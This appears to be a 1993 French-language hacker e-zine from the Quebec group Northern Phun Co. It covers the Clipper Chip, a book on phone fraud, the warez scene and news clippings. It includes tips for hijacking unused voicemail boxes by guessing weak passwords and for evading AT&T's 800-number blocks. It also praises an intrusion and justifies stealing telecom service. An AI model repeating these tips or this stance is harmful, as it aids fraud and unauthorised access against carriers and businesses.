===CUT HERE===
[ NOTE: Please see the COPYRIGHT/LICENSE notice at the end of
this document before any redistribution. ]
The following is a portion of Volume 1, Issue 03 of "What's Out
There?" written by Jeff Kellem <composer@Beyond.Dreams.ORG>.
This is expected to appear in the May/June 1993 issue of the
USENIX Association's hardcopy newsletter, ";login:".
Excerpted from "What's Out There?", Volume 1, Issue 03...
White House and NSA (Encryption) Clipper Chip Announcement
----------------------------------------------------------
On April 16, 1993, the White House announced the development of
an encryption chip for voice communications developed in
conjunction with the National Security Agency (NSA) called the
Clipper Chip, along with an initiative regarding
telecommunications and privacy which could literally affect
almost every citizen in the United States. On the same day, AT&T
announced a "secure" phone which incorporated this chip.
Some important things to point out:
o the encryption algorithm is remaining classified
[ In the cryptography community, an encryption algorithm is
only considered secure after it has been examined extensively and
independently by a wide array of experts around the world. With
an algorithm which is kept secret, there is no guarantee that it
is secure and that the encryption method has no "back door"
(allowing easy decryption for those, such as the NSA, that know
the "backdoor"). ]
o though the government has announced plans to use the chip
in their own phones, they do NOT plan to use it for CLASSIFIED
information, only for unclassified information.
o this chip has been in the making for 4 years; it would seem
that the Clinton Administration has already made plans to use the
chip, without public comment or discussion on a matter which is
so important to the privacy of that same public.
o it would seem that the Government might be granting a
monopoly to Mykotronx, Inc. and VLSI Technology. As far as I
know, VLSI fabricates the chip and Mykotronx programs the keys
into it.
o the key, which allows the information encrypted with this
chip to be decrypted, is embedded in the chip
[ This means that once the key is known, the chip needs to
be replaced to maintain private communications. This would
usually mean replacing the entire device (e.g. telephone),
anytime that the key was divulged, whether legally or not. The
key is also transmitted along with your encrypted data, so that
law enforcement can obtain it, which would allow them to decrypt
your data without your knowledge. ]
o the 80-bit key is made from the xor of two (2) 80-bit keys,
which are kept in databases at two different escrow agencies
[ It's not clear how the key databases will be kept secure.
It is also unknown if the classified encryption algorithm is any
less secure to brute-force attacks, once half the key is known. ]
o a successor chip has already been announced, called the
Capstone chip. The Capstone chip is supposed to be a "superset"
of the Clipper chip and will include the "digital signature
standard" (DSS), which many in the cyprotgraphy community seem to
consider insecure, as I recall. The NSA also developed DSS,
which wasn't disclosed until CPSR filed a FOIA request with NIST
(the National Institute of Standards & Technology).
This announcement, in one way, is a step in the right direction
-- privacy and encryption technology are important to the general
public and for international economic competitiveness. An
inquiry on whether export restrictions on encryption technology
is good or bad is also a good thing. Currently, companies that
want to include encryption as part of their products need to make
two versions -- one for domestic distribution and one for
international distribution.
On the other hand, there are too many things about the
announcement which are bothersome and need to be discussed
publicly. Some of these items have been mentioned above. The
Clipper Chip basically seems like it might provide privacy from
some people, but not from the government. I recommend talking
with your local congressman, writing letters, and discussing this
with friends.
Both the Electronic Frontier Foundation (EFF) and the Computer
Professionals for Social Responsibility (CPSR) have made public
statements against the announcement. The EFF supports the idea
of reviewing cryptographic and privacy policies, but believes
that the Clipper Chip announcement was premature and should be
delayed until after the overall review and discussion. The CPSR
has filed Freedom of Information Act (FOIA) requests regarding
the plan.
Online discussions of the announcement have been occurring all
over the Net in various USENET newsgroups and mailing lists.
Here's a sample of where you might find discussions of the
Clipper Chip:
USENET newsgroups:
alt.privacy.clipper
sci.crypt
alt.security
alt.privacy
comp.org.eff.talk
comp.security.misc
comp.society.cu-digest
comp.risks
Mailing lists:
cypherpunks-request@toad.com
Also, check the archives for the various groups listed above, as
things may have changed by the time this comes to print in
hardcopy come June 1993.
The official White House press release of the Clipper Chip can be
found via anonymous ftp from:
csrc.ncsl.nist.gov in the /pub/nistnews directory, or
via the NIST Computer Security BBS at +1 301 948 5717. It should
also be available with the rest of the White House press release
archives mentioned above.
The EFF comments were first published in the EFFector Online
Issue 5.06, which is available via anonymous ftp from:
ftp.eff.org in the /pub/EFF/newsletters directory.
Information from CPSR is available online via anonymous ftp from:
ftp.cpsr.org in the /cpsr directory.
The cypherpunks mailing list also maintains an archive.
Information on the Clipper Chip can be found via anonymous ftp
from: soda.berkeley.edu in the /pub/cypherpunks/clipper
directory.
Please do read the announcement of the Clipper Chip encryption
technology, think about and discuss the implications of this with
your friends, congressmen, and anyone else.
...End of excerpt.
COPYRIGHT/LICENSE:
This document is Copyright (c) 1993 Jeff Kellem/Beyond
Dreams, composer@Beyond.Dreams.ORG. This copyright notice must
be kept with each document.
You have permission to freely redistribute this for
non-commercial and non-profit purposes. It would be nice if you
let the author know about any redistributions that are expected
to reach more than a single person. :-) (This would include
mirroring ftp sites, etc.)
Please contact the author if you wish to use this document in
ANY other fashion. Most likely, there won't be a problem.
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
THEY WROTE THE BOOK ON NPC
par Blitzkreig
Le livre est finalement sorti. Il s'appelle: PHONE PIRATES,
Long Distance Theft: What It Is, How It Happens, And How To
Protect Your Phone Bills From Hackers, Phone Phreakers And
Organized Crime. Il est publi par Telemanagement Press, ISBN 0-
9694284-8-0. Il cote $55 dollars... mais chaque sou est mrit.
Les auteurs, Ian Angus et Gerry Blackwell (nous en parlions
dans le dernier numro) sont respectivement diteur et
journaliste pour TELEMANAGEMENT: The Angus Report On
Communications Systems, Services And Strategies. Jezz! Il va
falloir un jour que quelqu'un leur apprenne
dvelopper des
titres plus courts!
Ce livre est relativement abordable, financirement parlant,
si l'on considre qu'il est crit premirement pour les experts
en tlcommunication. Et ce livre est TOUT A FAIT abordable en ce
qui concerne le contenu de ses 244 pages.
Bon, on ne tournera pas autour du pot: on parle de NPC l
-
dedans. Et pas qu'un petit peu! C'est d'ailleurs le sujet de cet
article, de vous mettre l'eau
la bouche en tout ce qui concerne
le piratage, tel que discut par Blackwell et Angus.
Ainsi
la page 48, dans le chapitre intitul "Ripping off
the carriers":
AT&T CUTS THEM OFF - EVEN IN CANADA
As part of its campaign against hackers, AT&T requested and
received approval for a tariff which allows them to block known
hackers from placing calls on its 800 network. The carrier
monitors 800 trafffic constantly - if it detects high volumes of
short 800 calls coming from a single originating number, it first
checks with the owner of the 800 number to see if the calling is
legitimate. (For example, some radios shows generate high volumes
of calls for contests and request lines - such calling may look
like fraud.) If the owner of the 800 number says the calls are
not authorized, AT&T modifies its 800 data base to prevent that
originating number from placing any further calls to AT&T 800
numbers.
AT&T must, under the tariff, notify the caller that it has
taken this action, then restore service after six days. Then if
the hacking resumes, AT&T can cut off acccess indefinitely, until
the person responsible for the numbers offers assurances that the
hacking will end. ("For exemple, they might have to prove that
they've taken the kid's modem away", an AT&T security manager
told us.)
By June 1992, after nine months, AT&T had terminated access
for more than 2500 originating numbers, and warned thousands of
organizations that their 800 numbers were under attack.
The program is not limitated to calls originating in the
United States. This item, signed "Atreid Bevatron", appeared in
issue number 6 of NPC, a hacker newsletter published in Quebec
City:
"A few days ago, when I got home, I turned on my monitor and
discovered that some tones were detected (by my hacking program)
in 1-800-348-XXXX. I said 'Yay' and started to dial them by hand.
All the numbers where unreachable from my Area Code! I found this
bizarre, but after trying a few other numbers, I realized that my
number can't reach any 800 number belonging to AT&T.
Yes! Not one AT&T number. I even dialed some MCI numbers and
I could reach them. Same thing for Bell Canada 800s..."
----------------
Atreid a donc eu l'honneur de casser la glace dans le
bouquin de nos deux journalistes. Ca fait bizarre de relire nos
articles traduits en anglais! Mais en dehors de la fiert, il y a
des leons
tirer de ce passage: Atreid n'a jamais t avis par
AT&T de cesser ses activits, et n'est jamais pass par la
dconnexion temporaire de 6 jours. En vertu de la requte
(tariff) dpose par AT&T devant le FCC (quivalent US du CRTC),
Atreid serait donc en droit de revenir contre eux pour non-
respect de la procdure. Et puis, n'est-ce pas, si vous vous
rappelez de l'incident, la parade est facile: changer de numro
de tlphone quand tu es barr. Et on recommence. En passant,
nous voyons que toute cette opration de AT&T se fait aux States,
sans l'appui ou l'accord de Bell, ce qui nous renforce dans notre
opinion que tout crime en matire de tlcommunication excut
aux States par des Canadiens demeure impuni... si vous voyez ce
que je veux dire.
Mais continuons avec PHONE PIRATES, et les divers exemples
qu'il tire de NPC. Page 112, dans le chapitre intitul "How CPE
hackers work":
SECURITY WEAKNESSES
The other major problem with voice mail lies in the fact
that, in most cases, every employee has a voice mailbox. A large
proportion of those mailbox users do not understand -or refuse to
accept- the need for proper security. As a result we have found
that in almost any voice mail system some of the passwords are
exceptionally easy to guess. In our consulting practice, we have
seen systems on which more than half of the passwords could have
been guessed in fewer than 10 tries. No wonder hackers say voice
mail is too easy!
The security problems don't always lie with the users.
Hackers in search of voice mail boxes to uses for their own
purposes -or to use as bases for hacking the system as a whole-
find that the system administrator often ignores elementary
security procedures. A hacker based in Quebec City offered this
advice to those in search of mailboxes:
"When you find a box, it could be in one of two states:
occupied or free. You can hack any box, but a box you decide to
keep must absolutely not belong to anyone. It's what we call a
Free Box.
A Free Box is one which is in the system but doesn't belong
to anyone. Usually, the System Administrator creates ten or so
free boxes in the system. Why, you ask. Because all Sysadmins are
lazy and when a new employee is hired they don't have to bust
their ass to find free space and create a new box. All they have
to do is give the new employee the first free box on the list...
Usually, free boxes have passwords which are very easy to
remember. The majority of Sysadmins don't have their grade 10 -
do you think they'll be able to remember a random 10-digit
password for five month? No. So the principle is to try easy,
silly passwords." ("the ABC of VMB" by Mental Floss. Translated
from NPC#4, February 1993)
-----------------
Un autre extrait d'un texte de Mental suit dans quelques
instants. Mais je dois d'abord vous communiquer l'motion qui
m'treint... Les auteurs, au terme du livre, publient une
biographie des ouvrages qu'ils ont consult. Ils ont tout lu, ou
presque: les Phracks, les Legion Of Doom, tout. Et ce sont des
textes de NPC qu'ils retiennent, probablement pour leur qualit
et leur pertinence, pour illustrer leur livre! On dira ce qu'on
voudra...
Ceci dit, ils ont quand mme fait un travail de traduction
remarquable: Mental n'a jamais t aussi CLAIR! Quand il crivait
en franais, j'avais de la misre
le suivre, imaginez-vous!
Page 119...
VOICES FROM THE UNDERGROUND
In the following passages, hackers speak for themselves.
these remarks are taken from a variety of hacker sources -
primarily from files and messages found on computer bulletin
boards which specialize in hacker/phreaker material, but also
from books, pamphlets and magazines directed towards the same
audience. Passages referring to the ease or difficulty of hacking
specific products, or the positive or negatives features of
products, should be taken with a grain of salt - they typically
reflect only the hacker's own experience, not any thorough study
of the field. (...)
² AUDIX contains almost all the same options as the others, but
what characterizes this system is the use of * plus a letter to
reach the options. Examples: To transfer to extensions: *T(8); to
log into the message system: *S(8); to get help: *H(4); to delete
a message: *D(3); etc..."
Mental Floss, The ABC of VMB
--------------
Yo! Mental! Tu es mme cit AVANT Bootleg et son article sur
le phreak cellulaire qu'il avait compos pour HoHoCon 92, et
repris dans 2600!
Bon, c'est pas tout, a, on va pas commencer
vous citer
tous les endroits, dans le bouquin, o ils parlent de Mental ou
d'Atreid... Et puis, il y a d'autre monde dans NPC ;-)
Page 199....
JUSTIFICATION FOR HACKING
Some hackers don't seem to give much thought to why they
break into phone systems and computers - they want to, and they
can, so they do.
Others develop a whole set of quasi-political
rationalizations, reminescent of the 1960s youth counterculture.
"A good part of the phreak and hack mentality is that it's okay
to use a lot of this stuff because it's under-used by the people
who own it anyway", says Jim Morgan, a US phreaker we
interviewed. "There's a whole sort of goofy socialist thing".
A better term than socialist is Anarchist. Indeed, that's a
label which one component of the hacker underground uses to
describe itself. We found quite a few "underground" bulletin
boards which use the label "H/P/A" - for
"Hacking/Phreaking/Anarchism" - to describe the topics they
specialize in.
The Canadian International Society for Social Deviency
(CISSD), is one hacker group which claims political motivations
for their activities. An article in the group's on-line magazine,
Revival, says that the goal is "the greatest revolution ever
recorded".
"Deviancy, the art of going against the norms of society, if
practiced by enough people with enough frequency, WOULD become
the norm, thereby rewarding all who wished it with an altered
standard of living...
We have the power in our HANDS! We now need only make use of
it. For we have the reasons, just look into your paper. The time
is upon us, we must act. The WORLD calls for a change. It's our
responsability, because WE are the only people who can change it.
Hackers, Phreakers, Cyberpunks of the world, Unite to bring
about the new world order!"
When I pressed CISSD members for more information about the
"New World Order", they agreed that their views were not well
worked out - they were for open access to information, and a
"social democracy" of some kind.
Blitzkreig, the spokesman for the Northern Phun Co. hacker
group in Qubec City, had a more thoroughly thought out, but less
explicitly political defence of hacking. I asked how he justified
stealing long distance service and computer time.
"The phone companies tell us the future is global
communications. Get on it, get on the Internet, and things like
that. But on the other hand these companies charge what is in my
view an outrageous amount of money to use those services. It
could be dirt cheap and they would still make a profit. Bell made
$930 Million profit last year... Those are the crooks in my mind.
Arthur C. Clarke, the science fiction writer, talks about a
society in which communications will be free. That would be a
great thing. I believe information should be free and
communications should be dirt cheap.
(People phreak because) telecommunications charges are, in
many cases, prohibitive. You only receive a $500 long distance
bill once - then you find ways not to get another one. People do
H/P because they don't want to pay long distance - they are
forced to do it.
It's the same with the Internet. If I lived in New York
City, Internet access would cost me $15 a month. In Montreal it
would be about $25. But in Qubec City, Laval University has the
only Internet node - access starts at $90 a month. I don't have
that kind of money, but I have as much right to be on Internet as
people in New York or Montreal. So I forge accounts and steal
services - I don't have any other choice.
I would gladly be a legal user of Internet and long distance
if I could, but I can't, because the prices are prohibitive. So
I'm forced to do "evil things" - it's an economic necessity."
This argument can be summed up as "We steal long distance because
we have to make long distance calls and we can't afford them".
Similar arguments could, of course, be used to justify any form
of theft. But electronic theft seems "different", somehow.
Blitzkreig continues:
"You'll have a hard time convincing a kid in his parents'
basement, clicking away on his computer, that he is a big
criminal. They aren't robbing banks or service stations. It
doesn't feel like crime. In fact, the kids who are phreaking
couldn't shoplift a chocolate bar from a store - they'd get the
jitters.
It's like sex. In some states oral sex is against the law.
But people in their bedrooms don't think of themselves as
criminals. They are law abiding citizens who probably never drive
over the speed limit, but they break that one law."
The hackers are perfectly sincere in their arguments. But
when you strip away the self-serving verbiage, it all comes down
to this - they want to steal long distance, they can steal it
with very little chance of being caught or punished... so they do
steal it.
-----------------
Et puis, il y a un chapitre, commenant
la page 206,
intitul...
BLITZKREIG AND NORTHERN PHUN
According to the stereotype, all hackers are white males,
between 14 and 22 years old, with time on their hands. As a
generalization, the stereotype seems valid - but there are
exceptions. Essence (un autre pirate) is black. Lynne Doucette is
female. And Blitzkreig is 33 years old and has a full time job
with an above average salary.
Blitzkreig is the prime mover in the most active French-
language H/P group in North America, Northern Phun Co. From its
base in Qubec City, the group publishes a monthly on-line
magazine, NPC, and operates a surprisingly structured program of
self-education and network exploration. It is also attempting to
expand its horizons beyond Area Code 418 - NPC delegations have
traveled to New York City to establish relations with 2600
magazine, and the magazine regularly features reviews of BBSs in
other cities in Canada and the US.
Despite is age and prominence, Blitzkreig is fairly new to
the H/P scene. He began calling bulletin boards about two years
ago. In 1992, a journalist friend asked him to find some
"pirates" for an interview. The interview itself never took
place, but Blitzkreig's explorations led him to several hackers
in the Quebec City area. They got together and formed Northern
Phun Co. in November. It now has about 20 members, mostly high
school and junior college students.
"We have regular meetings. We go "trashing" (searching
dumpsters) together, we have all night hacking sessions, we call
UNIX systems to explore them, we exchange tricks, and so on.
Right now, we are exploring the Internet, and pretty soon we're
going to try cellular phreaking - we've already found a black
market dealer who sells stolen cellular phones."
The members of NPC have taught Blitzkreig about phreaking
and hacking. In return, he teaches a different kind of
communication skill.
"I don't know what it's like in English, but on the BBSs in
Qubec, the writing in French is completely horrible. The kids
have no language skills. I have experience as a writer, so I give
seminars on weekends to new writers for NPC, and I work with them
on their articles, correcting grammar and spelling, and so on. I
want to give them some respect for language".
Ironically, despite Blitzkreig's commitment to excellence in
French, almost every NPC member uses an English-language handle.
The list includes Santa Claus, Coaxial Karma, Fairy Dust, Mental
Floss, Silicon Phreaker, The SubHuman Punisher, Crime Lord, and
Live Wire. "You know", Blitzkreig says, "that English is the
international language and it's the language of the Internet. Our
handles reflect that."
Kermit, another NPC member I spoke to, seems to be typical
of hackers anywhere. He started with a VIC 20 when he was seven
years old, then graduated to a Commodore PET with a modem. "I
started calling public access boards first. Then someone told me
about a "cool" board, so I called, and it was an H/P board. I
went straight into hacking; I didn't go through a wares puppy
phase at all." Kermit is now the group's Internet expert. He
calls the Internet "the best thing in the world" because he can
talk to people all over the world from his computer.
The magazine NPC is the most ambitious Canadian H/P
periodical I've seen. Even printed out in tiny 8-point type, a
typical issue fills 100 or more pages. Articles include very
detailed instructions for using (or misusing) specific telephone,
voice mail, and computer systems. Evidently the members practice
what they preach, because NPC#6, published in May 1993, reports
that AT&T has blocked two of them from dialing 800-numbers, a
result of high-volume scanning and hacking.
In the spring of 1993, Northern Phun Co. members hacked into
a computer system used in the Qubec's premier's office. It
turned out that there was no sensitive information on the
computer, but the feat won them television and newspaper
coverage. Then, on one of their "trashing" expeditions, they
found a list of the combination codes for entering Bell Canada
buildings and offices, which they promptly published in the next
issue of NPC.
This type of thing attracts attention. "I'm known to the
authorities," Blitzkreig says. "The RCMP has been to my place
once. Not to search or arrest me. It was just a polite visit to
try to shake me up. They know that the group is just kids who
like to fool around, not real crooks. But they talked about the
danger that real crooks would read NPC and use the information to
do bad things".
The members of NPC, like most Qubcois their age, are
Qubec nationalists, but the group doesn't appear to have a
political agenda as such. Blitzkreig calls himself an anarchist,
a term he defines by quoting Noam Chomsky about the need to
question all existing institutions to determine if they are
valid. "We aren't embracing chaos, but we encourage our readers
to question authority."
But Blitzkreig would probably be a hacker even if he didn't
have a political justification. "The first time you scan and find
a PBX, or computer, it's a thrill. Chills go up and down your
spine. It's like sex. Perhaps it's even better, because hacking
sessions last six or seven hours at a time!"
-----------------
Quand je vous dit qu'il faut se mfier de ce que racontent
les journalistes! Ils vous mettent de ces mots dans la bouche...
On va arrter l
les citations, parce que le livre au
complet pourrait y passer. PHONE PIRATES. Pour vous le procurer,
tlphonez au 416-686-5050, ou faxez au 426-686-2655. Attention,
kids: les codes rgionaux en Ontario changent
compter du 4
octobre, et le nouveau code pour Telemanagement Press va devenir,
je crois, le 905.
Comme je l'ai dit (et vous pouvez vrifier en appelant) le
bouquin se vend $55. Mais si suffisamment de gens sont intresss
se le procurer, je peux tenter d'en faire venir une caisse et
de le ngocier
la baisse, style $30. Laissez-moi un message...
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
INTRODUCTiON A LA SCENE "WAREZ"
par The Shaman
Tous comme les premiers numros de NPC qui donnrent la
cl de la scne H/P/V/A/C
des dizaines de nophytes j'ai dcid
de faire de mme avec la scne "warez". Je ne dsire pas
provoquer une autre avalanche de morons et de lamers mais
informer ceux qui le dsirent, et peut-tre donner la piqre
certaines personnes qui pourrait s'avrer de bonnes recrues.
Premirement je vais vous donner ma propre opinion de la
scne
Quebec: il n'y en a pas (du moins pas encore) car il n'y
a qu'un seul et unique bbs majeur et tous les initis l'ont dj
reconnu: The Craftworld. Les autres bbs, dont le mien, ne font
que suivre la parade sans rien imposer... Pour certains c'est un
manque d'quipement qui en est la cause, pour d'autres c'est d
la simple stupidit du SysOp et de ses usagers. J'espre pouvoir
me classer dans la premire catgorie car il est evident qu'avec
120meg l'on ne va nul part. C'est d'ailleurs pourquoi je compte
mes sous pour m'acheter un HD un peu plus respectable, style 1.2
gigs.
Je vais maintenant tenter de synthtiser mes
connaissances sur le fonctionnement de la scne 418. La base
c'est dfinitivement les groupes de crackers comme: Razor 1911,
The Dream Team, The Humble Guys, et les autres. Tous ces groupes
ont des boards affilis ou des distribution sites
qui ils
envoient automatiquement chacune de leurs releases. Le maillon
suivant est le courier, c'est celui qui fait le lien entre les
bbs et les groupes. Si par exemple RZR a un jeu qui est prt
tre releas, ils contactent chaque courier, soit par voix ou sur
un VMB propre au groupe, pour leur annoncer la release. Quelque
soit l'heure du jour ou de la nuit le courier doit uploader le
jeu
tous les sites dont il est responsable. Par la suite les
diffrents users terminent la distribution sur les bbs qui ne
sont pas affilis avec un groupe. Il y a une vive comptition
entre les groupes de crackers et c'est
qui sera le plus rapide
ou le plus productif.
Mme si plusieurs lamers croient que c'est faux et
s'obstinent
applyer sur mon bbs, l're du 2400 est belle et
bien termine, pour les wares du moins. Car avec la grosseur des
releases les 2400 ne font rien qu'encombrer les lignes de bbs.
Car transfrer un jeu comme NHL Hockey 94 prend environ 45
minutes en 14.4, mais cela prend plus de 4 heures en 2400 (ce ne
sont que des aproximations, je n'ai pas calcul...).
Dans les annes
venir, la scne devra se rajuster car
avec l'avnement des CD-ROM les jeux prennent de plus en plus de
poids et il seront bientt impossibles
distribuer... La plupart
des gens vraiment intresss devront ouvrir leurs porte-monnaies
et devront se procurer une console copier pour entrer dans la
scne SNES ou Genesis.
J'espre que quelques personnes apprendront quelque chose
en lisant ce bref rsum. Je souhaite aussi que la scne de
Qubec se dveloppera et qu'un jour on pourra faire du wares
"srieux"
Qubec sans devoir caller nos voisins du Sud. J'y
travaille et j'espre qu'il y en a d'autres.
The Shaman
POST SCRIPTUM PAR BLITZKREIG...
Un texte pour non-initis seulement, donc. Ce que Shaman ne
sait pas, c'est que (you hear it here first...) Craftworld ferme
ses portes le 14 octobre. Adieu Slum! Il y aura toujours une
place d'crivain pour toi au sein de NPC!
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
Vous pensiez que l'article prcdent tait ordinaire? Vous
tes peut-tre mieux de sauter celui-ci... Eh... Hum... J'ai
succomb
la tentation, et... oh! j'ai honte!... J'ai... ripp
une chanson! YaUUUgHH!
-Blitz
(EVERY THING WE DO) WE DO IT FOR YOU
Sur l'air de la toune de Bryan Adams
Look into our mag
You will see what H-P means to us
Search your board, search your disk
And when you find us there
You'll search no more
Don't tell us it's not worth printing for
You can trash us, but it's still worth writing for
You know it's true, everything we do
We do it for you
Look into our boards
You will find there's nothing there to hide
Quote us as we are, reply if you will
We will print it up, we will publish
Don't tell us it's not worth dialing for
We can hack it, there's nothing we want more
You know it's true, everything we do
We do it for you, oh yeah
Be it Toneloc or PGP
None other could give more tricks
There's a way unless you're to lame to try
All the way, yeah
Right to Bell's heart, babe, yeah
Oh yeah, oh, and Unitel too
It's really worth fighting for
We can't help it, there's nothing we want more
Yeah, we would trash for you, we'd lie for you
Hook the wires for you, yeah, we'd write for you
You know it's true, everything we do, oh, oh
We do it for you
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
READ THE NEWS, DON'T BELIEVE THE HYPE
par -=ThE PoSSe=-
avec la collaboration de Paranoid
Leeched from LE SOLEIL - Jeudi 16 septembre 1993
VASTE MPRISE INFORMATIQUE DE L'INDUSTRIELLE ALLIANCE
par Jean-Marc Salvet
Plus de 1500 "offres d'adhsion pour ex-assurs" ont t,
par mgarde, postes par L'Industrielle Alliance
au moins cinq
personnes qui ont ainsi reu chacune environ 300 documents qui ne
leur taient pas destins. Un cafouillage du systme informatique
de l'assureur est
l'origine de la mprise. (...)
Plutt que d'indiquer une adresse diffrente
l'emplacement
prvu
cet effet sur chaque document, le systme informatique a
imprim la mme adresse des centaines de fois. (...) Personne
L'Industrielle Alliance n'est encore en mesure d'expliquer la
cause exacte de l'erreur survenue la semaine dernire. Encore
tonn, M. Papineau [directeur de la perception des primes]
constate que le problme s'est rsorb de lui-mme. "Une
opration du Saint-Esprit", dit-il. (...)
Pour la petite histoire, mentionnons que le journaliste des
pages conomiques du Soleil, Vianney Duchesne, a lui aussi reu
un lot de 330 envois
son adresse personnelle...
- 30 -
[Blitz: ALL RIGHT! WHO'S THE WISE GUY? Parce que l'opration du
Saint-Esprit, et les "erreurs malencontreuses", hein, on connat
a! Et, en plus, au moins un journaliste tait sur la liste, une
liste de cinq noms seulement: c'est pas mal trop beau pour tre
"un cafouillage du systme informatique". Qui parmi vous, chers
lecteurs, a fait le coup? On veut pas de nom, on veut un article
expliquant comment vous vous y tes pris! En passant, rigolo,
votre truc! Vous avez rien dtruit sur le systme, vous avez tout
remis en place aprs votre "dmonstration", et vous avez permis
quelques employs (probablement sous-pays) de L'Industrielle de
faire un peu de cash en temps supplmentaire, pour rparer
l'affaire. NPC est fier de vous!]
Leeched from INFO-TECH MAGAZINE - Septembre 1993
MICROSOFT FRAPPE LES PIRATES DE SON JUSTE COURROUX
Microsoft se fait de plus en plus dure envers les pirates.
C'est ainsi qu'un tribunal vient de condamner BEC Computer
verser
l'entreprise du sieur Gates un ddommagement record de
12,5 millions de dollars amricains. Apparemment, une des
filiales taiwannaises de BEC, Ley Her Enterprise, aurait revendu
l'unit des exemplaires du DOS et de Windows plutt que de les
donner
l'achat d'un PC clone fabriqu par BEC, tel que prvu
dans la licence de Microsoft.
En juillet dernier, Microsoft terminait quatre mois de raids
effectus partout aux tats-Unis en collaboration avec le FBI,
les douanes et les forces locales. Cette opration a permis de
dmanteler plusieurs rseaux de piraterie et de saisir des biens
pour plusieurs milliards de dollars. Au mme moment, un Grand
jury amricain accusait Abba Systemations et Ever Suplly, deux
entreprises amricano-asiatiques, d'avoir pirat des dizaines de
milliers de copies du DOS et de Windows et d'avoir blanchi
l'argent rcolt.
Et l'on n'aurait encore rien vu. Microsoft entendrait aller
encore beaucoup plus loin pour contrer la piraterie orientale,
mme si cela occasionnait des mises en faillite. C'est du moins
ce que l'on soutient du ct de Redmond, Washington.
Rappelons qu'aux tats-Unis un pirate peut coper de cinq
ans de prison et de 250 000$ US d'amende. Au Canada, l'amende
peut toutefois grimper jusqu'
un million de dollars en cas de
rcidive.
BORLAND CONFIRME PLAGIAIRE
Les tribunaux viennent
nouveau de statuer sur le fait que
le chiffrier Quattro Pro, de Borland, avait bnfici de certains
emprunts gnants faits
Lotus 1-2-3. "Aucun jury raisonnable, a
dclar le juge, ne reconnatra que Borland n'a pas emprunt (
Lotus) les commandes de menu, la structure de ces commandes, le
macro langage et les squences de touches", autant d'lments
protgs par la loi du Copyright. Il est ici question de
l'interface Lotus, destine
faciliter la vie aux habitus de 1-
2-3, et dont Borland s'est dbarrasse en aot 1992, date du
premier jugement dfavorable.
videmment, tous ces litiges ont caus
Borland beaucoup de
tort. Ses actions ont chut, 350 employs ont t congdis en
dcembre, et un dficit de 61,3 millions de dollars amricains a
t enregistr au premier trimestre 1992. Depuis, la rumeur va
bon train sur une fusion Lotus-Borland...
- 30 -
Leeched from LA PRESSE - Jeudi 9 septembre 1993
LETTRE A UN TI-CUL QUI VA ALLER VOTER
par Pierre Foglia
Il a 18 ans. Il est tudiant et il veut btir un pays. Il
s'appelle Alexandre Morin. Il a sign une longue lettre dans La
Presse au dbut de l't. Il parlait de ses amis dcourags. Il
disait que les vieux -nommment Durivage, Mongrain, les
conomistes, moi- qui "imposent le pessimisme" l'coeuraient.
C'tait le titre de sa lettre d'ailleurs: "Arrtez d'imposer le
pessimisme". Sa lettre a t trs applaudie par une lgion de
tteux qui croient comme lui que a pue quand on remue la marde.
Je ne sais plus quel empereur romain faisait dcapiter le
messager quand la nouvelle tait mauvaise. Les nouvelles ont
continu d'tre mauvaises, bien sr. Parce que c'est la marde qui
pue. Pas celui qui la remue.
Anyway.
Il a 18 ans et il a l'air de croire que a fait une
diffrence. Il a l'air de croire que c'est parce que je suis
vieux et blas que je ne vais pas voter. Mais non jeune homme.
Quand j'avais 18 ans, je n'allais pas voter non plus. Et il y
avait dj
des petits straights comme toi qui venaient me faire
la morale.
Ce n'est pas une question d'ge. C'est une question de bord.
On n'est pas du mme bord. Je prends ton premier paragraphe. "Je
veux btir un pays, dis-tu, dans lequel la culture qubcoise se
tiendra debout face au gant amricain et fera briller sa
splendeur
travers la plante."
Je n'aurais jamais pu crire un truc comme a. Jamais. Ni
18 ans, ni
25, ni
35. Mme pas
12 ans, l'ge le plus bte.
Il faut singulirement manquer de culture pour songer
la faire
briller. Je crains, jeune homme, que tu confondes la culture et
les mdailles olympiques.
Ce n'est pas une question d'ge. C'est une question de bord.
On n'est pas du mme bord, c'est tout. Et contrairement
ce que
tu avances, je ne t'impose rien jeune homme. J'essaie seulement,
avec mes petits cailloux, de faire des ricochets sur la mer tale
de la pense positive. Votre merdique pense positive. Votre sida
de la tte. L
est la vraie dictature du temps. De plus en plus,
dans votre monde grimaldien aplati, la moindre dissidence est
percue comme une marque d'hostilit. Mme la critique devrait
tre "positive"... Tiens, au lendemain des "mdivales", le
confrre du Devoir qui a os dire que leurs pompes taient un
tantinet ridicules,
dclench un concert d'indignation. Dans
votre monde grimaldien, il est interdit de ne pas se rouler par
terre. (...)
Ce n'est pas une question d'ge. C'est une question de
colonne vertbrale. Une question de bord aussi. Depuis tout
petit, je suis de "l'autre" bord. Quand j'entends "capital", je
hurle. Quand j'entends "richesse collective", je hurle parce que
j'ai vu tout l't monsieur et madame tout le monde tondre leur
gazon, leurs gros culs tressautant sur des petits tracteurs
3000$, et c'est cela justement la richesse collective, et
seulement cela: remplacer sa tondeuse
gazon par un tracteur.
Elle fait vroum-vroum-vroum et pout-pout-pout ta richesse
collective, sur des gazons rass de plus prs qu'un cadre
suprieur.
Il faut que je te dise aussi que lorsque j'entends "projet
de socit" je hurle. A force de rptition, la formule est
devenue creuse, triviale. (...) Certains se font un grand projet
de l'indpendance qu'il faudrait faire, mais jamais du pays qui
suivra, sauf pour dire, qu'il sera "extraordinaire" ce pays, que
son avenir est "radieux", ses gens "merveilleux" et leurs projets
"splendides". Ce sont tes mots jeune homme. Je ne sais pas si tu
cherches une job, mais si j'tais Jean-Marc Chaput je t'offrirais
de porter mes valises.
Au fait, il est o ton projet dans ta lettre? Dans le
premier paragraphe, quand tu dis que dans ton Qubec, "l'conomie
sera base sur les domaines de la recherche et de la haute
technologie qui fourniront beaucoup d'emplois?"... Original. Es-
tu au courant que pour l'instant, la haute technologie en
supprime des milliers d'emplois?
Tu te demandes peut-tre pourquoi j'ai attendu tout ce
temps-l
